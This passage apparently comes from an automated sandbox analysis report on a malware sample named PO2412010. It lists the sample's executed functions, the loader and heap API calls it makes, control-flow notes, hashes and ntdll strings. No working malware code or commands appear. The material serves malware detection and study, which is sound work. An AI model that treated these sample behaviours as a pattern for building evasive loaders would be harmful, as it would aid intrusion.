413c82 94985->94976 94986->94985 94987 418cc8 94988 42c663 NtClose 94987->94988 94989 418cd2 94988->94989 94990 1ac2b60 LdrInitializeThunk

                                                                        Executed Functions

                                                                        Function 00417723 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 356 417723-41774c call 42f323 359 417752-417760 call 42f923 356->359 360 41774e-417751 356->360 363 417770-417781 call 42ddc3 359->363 364 417762-41776d call 42fbc3 359->364 369 417783-417797 LdrLoadDll 363->369 370 41779a-41779d 363->370 364->363 369->370
                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417795
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1811060846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_PO2412010.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID:
                                                                        • API String ID: 2234796835-0
                                                                        • Opcode ID: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                                        • Instruction ID: c8367a89be375ba73a30cdb688ded44f01425706de2ca614d69ed47fcf1ac29a
                                                                        • Opcode Fuzzy Hash: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                                        • Instruction Fuzzy Hash: 49010CB5E00209BBDB10DBE5DC42FDEB7789B54308F4041AAA91897281FA35EB588B95
                                                                        Function 0042C663 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 376 42c663-42c69c call 404783 call 42d8c3 NtClose
                                                                        APIs
                                                                        • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C697
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1811060846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_PO2412010.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                                        • Instruction ID: 55d98cbac179b72a764dd86cd5ec1f11a461976065f381c4f300eafe1b6f3ecb
                                                                        • Opcode Fuzzy Hash: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                                        • Instruction Fuzzy Hash: E8E086326402147BD210FB6ADC41FD7776CDFC5714F00451AFA1867242C6757A1587F5
                                                                        Function 01AC2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 390 1ac2b60-1ac2b6c LdrInitializeThunk
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: c03a7c5a8d1f6a95dd4aa255187f4f9eb93b53bc0c98f4a49e0ac6a90705e9d0
                                                                        • Instruction ID: de296589d0399bf82962802a68eb4dfbb35b5630c4d9e0f4f2add8611b4de6ee
                                                                        • Opcode Fuzzy Hash: c03a7c5a8d1f6a95dd4aa255187f4f9eb93b53bc0c98f4a49e0ac6a90705e9d0
                                                                        • Instruction Fuzzy Hash: 5A90026520281003410571584414616401A97E0201F56C021E1024591DC52989916226
                                                                        Function 01AC2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 65ac067b6c0b50063d2335a8b93d0a8bbed04c36c5ccba08c977dbfb6a89869d
                                                                        • Instruction ID: 3524f9f5564a400d6733bd3cdc4b0f113e141797c711dc5c66505556307bbb4b
                                                                        • Opcode Fuzzy Hash: 65ac067b6c0b50063d2335a8b93d0a8bbed04c36c5ccba08c977dbfb6a89869d
                                                                        • Instruction Fuzzy Hash: 4790023520181413D11171584504707001997D0241F96C412E0434559DD65A8A52A222
                                                                        Function 01AC2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 391 1ac2c70-1ac2c7c LdrInitializeThunk
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: f081180436cbcd4aa18207d823045749e444bec1de3ae9a0825c38b3f4a6cc2d
                                                                        • Instruction ID: 4c8f5e964ac9caf1ef1d80db497f44eacb1a27767aac496d3d5cbb4fd4c182b2
                                                                        • Opcode Fuzzy Hash: f081180436cbcd4aa18207d823045749e444bec1de3ae9a0825c38b3f4a6cc2d
                                                                        • Instruction Fuzzy Hash: D790023520189802D1107158840474A001597D0301F5AC411E4434659DC69989917222
                                                                        Function 01AC35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: cde12c4a4fd56179a35023d0fab75a163181f07374bc4c337bd499d51c79f88e
                                                                        • Instruction ID: f9047d6ccd565c986c5e695d34a7e55e24156937e84c2437fa28a70b98269290
                                                                        • Opcode Fuzzy Hash: cde12c4a4fd56179a35023d0fab75a163181f07374bc4c337bd499d51c79f88e
                                                                        • Instruction Fuzzy Hash: 4F90023560591402D10071584514706101597D0201F66C411E0434569DC7998A5166A3
                                                                        Function 00413F8F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63threadwindowCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • PostThreadMessageW.USER32(l420377x,00000111,00000000,00000000), ref: 0041400A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1811060846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_PO2412010.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID: S$l420377x$l420377x
                                                                        • API String ID: 1836367815-2727433438
                                                                        • Opcode ID: 359c6fffe9613725b5ac8c672145e67f63efc52315c8541c79e7ad6c697c6183
                                                                        • Instruction ID: c2806ac613a218a9f43bc075071cdee210e11ad5ac0fb3b5002561ad8e7d22f2
                                                                        • Opcode Fuzzy Hash: 359c6fffe9613725b5ac8c672145e67f63efc52315c8541c79e7ad6c697c6183
                                                                        • Instruction Fuzzy Hash: 43114C71D0015C7AEB10AAE69C81DEF7B7CDF4579CF448069FA0467141D27C8E064BB5
                                                                        Function 00413F93 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 15 413f93-413fc5 call 42e7e3 call 42f1f3 20 413fcb-413ffd call 404733 call 424e23 15->20 21 413fc6 call 417723 15->21 26 41401d-414023 20->26 27 413fff-41400e PostThreadMessageW 20->27 21->20 27->26 28 414010-41401a 27->28 28->26
                                                                        APIs
                                                                        • PostThreadMessageW.USER32(l420377x,00000111,00000000,00000000), ref: 0041400A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1811060846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_PO2412010.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID: l420377x$l420377x
                                                                        • API String ID: 1836367815-444879537
                                                                        • Opcode ID: c759df97fc8d8bd9950daa468166aab63e6b13b68f94bc1cf4dd968c4ef8860b
                                                                        • Instruction ID: 33197e0a7dcb6eb663e71045ce9ebb9a0ec692f75d002f1c99a84e6dd662f6bc
                                                                        • Opcode Fuzzy Hash: c759df97fc8d8bd9950daa468166aab63e6b13b68f94bc1cf4dd968c4ef8860b
                                                                        • Instruction Fuzzy Hash: 4A0126B2D0025C7AEB10AAE69C81DEFBB7CDF44798F408069FA0467141D67C9E064BB5
                                                                        Function 00413F72 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55threadwindowCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 29 413f72-413f79 30 413fb5-413ffd call 417723 call 404733 call 424e23 29->30 31 413f7b-413f87 29->31 38 41401d-414023 30->38 39 413fff-41400e PostThreadMessageW 30->39 39->38 40 414010-41401a 39->40 40->38
                                                                        APIs
                                                                        • PostThreadMessageW.USER32(l420377x,00000111,00000000,00000000), ref: 0041400A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1811060846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_PO2412010.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID: l420377x$l420377x
                                                                        • API String ID: 1836367815-444879537
                                                                        • Opcode ID: 3262b01b000be0360b63c840c83d9d807fb3e09adfdf533a4899f21b81f85822
                                                                        • Instruction ID: 07d8ccd72df32b7def514bcf1009cf5c80a90bfc08a7e37c420c6dc4dd04ca91
                                                                        • Opcode Fuzzy Hash: 3262b01b000be0360b63c840c83d9d807fb3e09adfdf533a4899f21b81f85822
                                                                        • Instruction Fuzzy Hash: 5D0140B3E0005876D7105EA55CC1CEFBB7CDE84754F4040ABFA0497201E66E4E024BA5
                                                                        Function 0042C9E3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 41 42c9e3-42ca24 call 404783 call 42d8c3 RtlFreeHeap
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CA1F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1811060846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_PO2412010.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID: wdA
                                                                        • API String ID: 3298025750-2931128418
                                                                        • Opcode ID: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                                        • Instruction ID: 9a34639f9b590f445554bb3374e68085bc2f8b1a53e3d8f22fb1199bbd37af40
                                                                        • Opcode Fuzzy Hash: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                                        • Instruction Fuzzy Hash: E6E06D72604205BBD614EF59EC85FAB37ADDFC9714F004419FE18A7242C671B9118AB8
                                                                        Function 0042C993 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 371 42c993-42c9d4 call 404783 call 42d8c3 RtlAllocateHeap
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(?,0041E4EE,?,?,00000000,?,0041E4EE,?,?,?), ref: 0042C9CF
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1811060846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_PO2412010.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                                        • Instruction ID: 36e320101d405b986edb5f0360d5375c690b058552b8fab17163e86361dfcef2
                                                                        • Opcode Fuzzy Hash: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                                        • Instruction Fuzzy Hash: D6E06DB2604204BBD714EE99EC41EAB77ACDFC5750F004419FD18A7282D671B9108BB9
                                                                        Function 0042CA33 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 381 42ca33-42ca6c call 404783 call 42d8c3 ExitProcess
                                                                        APIs
                                                                        • ExitProcess.KERNEL32(?,00000000,00000000,?,5B435AB9,?,?,5B435AB9), ref: 0042CA67
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1811060846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_PO2412010.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: 898f235de1112ca79113d7bdd050537dfc5d7c103be820d62ecc6fe10eccdd2d
                                                                        • Instruction ID: e0f95e071271af0ef5bae3a3abc99ff131e4bcb123f1ba6cdcf3cfbd638433f3
                                                                        • Opcode Fuzzy Hash: 898f235de1112ca79113d7bdd050537dfc5d7c103be820d62ecc6fe10eccdd2d
                                                                        • Instruction Fuzzy Hash: 4CE04F766002187BD220AA9AEC41F97775CDFC9714F50441AFA1867182C6717A1586A4
                                                                        Function 01AC2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 386 1ac2c0a-1ac2c0f 387 1ac2c1f-1ac2c26 LdrInitializeThunk 386->387 388 1ac2c11-1ac2c18 386->388
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 850272f1b2b1cf949c872599a0b3b8ce22e8b528c13ecaa748585ab4aa3fb0fd
                                                                        • Instruction ID: 9a3b235e101fa9c355701eeab278391c3b975c4c8d64c7f5485592e831ed2eb5
                                                                        • Opcode Fuzzy Hash: 850272f1b2b1cf949c872599a0b3b8ce22e8b528c13ecaa748585ab4aa3fb0fd
                                                                        • Instruction Fuzzy Hash: B3B09B719059D5C5DA11E7644608717791077D0701F16C076D2030642F473CC5D1E276

                                                                        Non-executed Functions

                                                                        Function 01B02349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-2160512332
                                                                        • Opcode ID: 2ecea04537cefeded93556a4982283a87fc34e592c3a230d589face84ec02880
                                                                        • Instruction ID: 8263fc9fdcab055fd5a4b6f33c098be4508ce4eb2a0781a16d51e9c3e7e88f4a
                                                                        • Opcode Fuzzy Hash: 2ecea04537cefeded93556a4982283a87fc34e592c3a230d589face84ec02880
                                                                        • Instruction Fuzzy Hash: B2928F71604742AFE72ADE19C884B6BBBE8FF84750F04499DFA94D7290D770D848CB52
                                                                        Function 01AB8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • Thread identifier, xrefs: 01AF553A
                                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 01AF5543
                                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01AF540A, 01AF5496, 01AF5519
                                                                        • Invalid debug info address of this critical section, xrefs: 01AF54B6
                                                                        • Address of the debug info found in the active list., xrefs: 01AF54AE, 01AF54FA
                                                                        • undeleted critical section in freed memory, xrefs: 01AF542B
                                                                        • Critical section debug info address, xrefs: 01AF541F, 01AF552E
                                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01AF54CE
                                                                        • corrupted critical section, xrefs: 01AF54C2
                                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01AF54E2
                                                                        • Critical section address, xrefs: 01AF5425, 01AF54BC, 01AF5534
                                                                        • 8, xrefs: 01AF52E3
                                                                        • double initialized or corrupted critical section, xrefs: 01AF5508
                                                                        • Critical section address., xrefs: 01AF5502
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                        • API String ID: 0-2368682639
                                                                        • Opcode ID: 1a19d311f4ccbf539c45b58f945e5bcc7250c5d66f95a473ba35febcabbaa239
                                                                        • Instruction ID: 1075d801346409c81a1ad3a5c65c77adae7043d91b6587e98f943620b9222103
                                                                        • Opcode Fuzzy Hash: 1a19d311f4ccbf539c45b58f945e5bcc7250c5d66f95a473ba35febcabbaa239
                                                                        • Instruction Fuzzy Hash: A5816AB1E40348AFDB24CF99C945BAEBBB9FB08714F14411EF614B7291D375A940CB60
                                                                        Function 01AB29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01AF2498
                                                                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01AF22E4
                                                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01AF2412
                                                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01AF25EB
                                                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01AF2409
                                                                        • @, xrefs: 01AF259B
                                                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01AF24C0
                                                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01AF2602
                                                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 01AF261F
                                                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01AF2624
                                                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01AF2506
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                        • API String ID: 0-4009184096
                                                                        • Opcode ID: 4a507e02b888837aa0a926d34bbdb6ab0e89064ded70c00efe559cc063d35a24
                                                                        • Instruction ID: 2f5951c079da9d257df2212f479ff0f4916667ff8e30ea70e92416d42e905f52
                                                                        • Opcode Fuzzy Hash: 4a507e02b888837aa0a926d34bbdb6ab0e89064ded70c00efe559cc063d35a24
                                                                        • Instruction Fuzzy Hash: 5A026FF1D002699BDB31DB54CD80BEAB7B8AB55704F0441EBA709A7242DB70AE84CF59
                                                                        Function 01B28B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                        • API String ID: 0-2515994595
                                                                        • Opcode ID: 2e7e6d23eb4300b2ca3e28eed0b23caa3172f4c6ffec92dd2aa102ed3d279194
                                                                        • Instruction ID: b32861c1d0981134f846f24d78960440ec4ab102d3feb92dd53b599c24d6f5b1
                                                                        • Opcode Fuzzy Hash: 2e7e6d23eb4300b2ca3e28eed0b23caa3172f4c6ffec92dd2aa102ed3d279194
                                                                        • Instruction Fuzzy Hash: 1851E0711083219BC32ADF588944BABBBECFF98640F540A5DF959C3241E770D64CCB92
                                                                        Function 01B30274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                        • API String ID: 0-1700792311
                                                                        • Opcode ID: 9273b9f60344ce2e6bedb00a7976ca13a561339cc0cb73d87083b38d72e4c091
                                                                        • Instruction ID: 4aa41d8fac882c9179458528ecc4a478f3d65a4a50384145fada57be4baf0362
                                                                        • Opcode Fuzzy Hash: 9273b9f60344ce2e6bedb00a7976ca13a561339cc0cb73d87083b38d72e4c091
                                                                        • Instruction Fuzzy Hash: 08D10331604686EFDB2AEF68C840AAEFBF1FF99710F198099F4459B252C734DA51CB50
                                                                        Function 01B089B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • VerifierDebug, xrefs: 01B08CA5
                                                                        • VerifierDlls, xrefs: 01B08CBD
                                                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01B08A67
                                                                        • HandleTraces, xrefs: 01B08C8F
                                                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01B08A3D
                                                                        • VerifierFlags, xrefs: 01B08C50
                                                                        • AVRF: -*- final list of providers -*- , xrefs: 01B08B8F
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                        • API String ID: 0-3223716464
                                                                        • Opcode ID: c3e90574108f080a9c3840009933331f8527dad52fb6b255b7e7e6e3b6bda566
                                                                        • Instruction ID: 84b7528e23570780fd2bd9629bcf992413ee5fee30a3ddbc739a22b1fa56a737
                                                                        • Opcode Fuzzy Hash: c3e90574108f080a9c3840009933331f8527dad52fb6b255b7e7e6e3b6bda566
                                                                        • Instruction Fuzzy Hash: 3A912871A45716AFD73BEF289880B5A7FA8FB54714F05069CFA45AB291C730EE00CB91
                                                                        Function 01A8EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                        • API String ID: 0-1109411897
                                                                        • Opcode ID: 17a795c94324156eb5d4a49aaf89a21601fe47a4e7bde203d08d5f551850a170
                                                                        • Instruction ID: 8fc13772756132ee0cbb5499d3a33bb367342eafb74865ecb7b7c507279d970f
                                                                        • Opcode Fuzzy Hash: 17a795c94324156eb5d4a49aaf89a21601fe47a4e7bde203d08d5f551850a170
                                                                        • Instruction Fuzzy Hash: B9A24970A0562ACFDB64EF19CD887A9BBB5AF49304F1442E9D90DE7291DB309E85CF40
                                                                        Function 01AB63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
